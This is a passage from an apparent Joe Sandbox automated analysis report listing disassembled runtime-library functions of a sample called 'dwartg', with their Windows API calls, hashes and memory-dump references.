                                                                                              • Instruction ID: 1e2223f70b577ee5254c014553fcd74677307ee944acad906459f4288d5710d9
                                                                                              • Opcode Fuzzy Hash: 79b28cf346e344f66fb151995496e40c840d158a6cb1ea9784dd44b7bdbf5c37
                                                                                              • Instruction Fuzzy Hash: FE01DB75901229ABCB14DFA4E844ADEBBF8FF09710B20415AE905E7250D7789A40CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007491E0,?,00000000,?,00000001,?,?,00000001,007491E0,?), ref: 0074C9D5
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0074CA5E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00746CBE,?), ref: 0074CA70
                                                                                              • __freea.LIBCMT ref: 0074CA79
                                                                                                • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: 160492602dafee7bdb4f6986e2c4305a8b7d5a2f0e6c9bcef88f903bae00a89f
                                                                                              • Instruction ID: 2d564270878c5035ecfded40e034aa591679c2de812d959179a7d3d6c0711b23
                                                                                              • Opcode Fuzzy Hash: 160492602dafee7bdb4f6986e2c4305a8b7d5a2f0e6c9bcef88f903bae00a89f
                                                                                              • Instruction Fuzzy Hash: 5B319072A0221AABDF26DF74DC45DEE7BA5EB41350F148168FC04E6261EB39DD50CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcschr
                                                                                              • String ID: .lnk$ds
                                                                                              • API String ID: 2691759472-1819217326
                                                                                              • Opcode ID: 3cb0bd940c676f96703609ae72cc16db184e53bc6c1d69a98ffa17538498f3b6
                                                                                              • Instruction ID: a780ea51195344ca51725b2f1cdb487c20d99200bf7fb6156ec6cc7c409d317f
                                                                                              • Opcode Fuzzy Hash: 3cb0bd940c676f96703609ae72cc16db184e53bc6c1d69a98ffa17538498f3b6
                                                                                              • Instruction Fuzzy Hash: DDA1317290012996EF34DBA4DD59EFA73FCAF44304F0885A6B509E7142EF789F848B61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00010000,00731160,?,00000000,00000000), ref: 00731043
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 0073108A
                                                                                                • Part of subcall function 00726C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00726C54
                                                                                                • Part of subcall function 00726DCB: _wcschr.LIBVCRUNTIME ref: 00726E0A
                                                                                                • Part of subcall function 00726DCB: _wcschr.LIBVCRUNTIME ref: 00726E19
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2706921342-3849766595
                                                                                              • Opcode ID: f032abed455112b54a1f959d6787a5d81e04ebe1988f0e812243d7d9130640fd
                                                                                              • Instruction ID: 0a8009cc8bade56628ba07e67d621f4ed6e2280baf961a9279ce8eb76758a1f9
                                                                                              • Opcode Fuzzy Hash: f032abed455112b54a1f959d6787a5d81e04ebe1988f0e812243d7d9130640fd
                                                                                              • Instruction Fuzzy Hash: CE01FEB534430D6FE7346F64AC55BB6B359EB40751F20042EF947521D1CEE96CC54624
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcschr
                                                                                              • String ID: <9u$?*<>|"
                                                                                              • API String ID: 2691759472-1881834610
                                                                                              • Opcode ID: 9dbe60ce3a1ff67ab8ea4464e774f43190686f163ae3b34976749307b15c9b46
                                                                                              • Instruction ID: 5e5c9f2ee500926741c626ae99eaaa3765fc4562f73a282fb6db53df7c550436
                                                                                              • Opcode Fuzzy Hash: 9dbe60ce3a1ff67ab8ea4464e774f43190686f163ae3b34976749307b15c9b46
                                                                                              • Instruction Fuzzy Hash: B8F0D153A44321C1C7311A29BC01B3AB3E4EFB5720F38081EE5C8872D2E6AD98C082A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00748268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0074BF30: GetEnvironmentStringsW.KERNEL32 ref: 0074BF39
                                                                                                • Part of subcall function 0074BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074BF5C
                                                                                                • Part of subcall function 0074BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0074BF82
                                                                                                • Part of subcall function 0074BF30: _free.LIBCMT ref: 0074BF95
                                                                                                • Part of subcall function 0074BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0074BFA4
                                                                                              • _free.LIBCMT ref: 007482AE
                                                                                              • _free.LIBCMT ref: 007482B5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                              • String ID: 0"x
                                                                                              • API String ID: 400815659-575046572
                                                                                              • Opcode ID: 7505c69dc6535633e76b85dee9e95338e4001b3c6091babb21e435f5a2f92159
                                                                                              • Instruction ID: 1f5f410fc78f00ec7d8363e5c4a4ce0d6744abc99434c38bd5af54256bcf67f6
                                                                                              • Opcode Fuzzy Hash: 7505c69dc6535633e76b85dee9e95338e4001b3c6091babb21e435f5a2f92159
                                                                                              • Instruction Fuzzy Hash: 43E02B33B0AD46D192E132792C0E62F0640AFC5339B150326F910CB0D3CF9C880749E7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%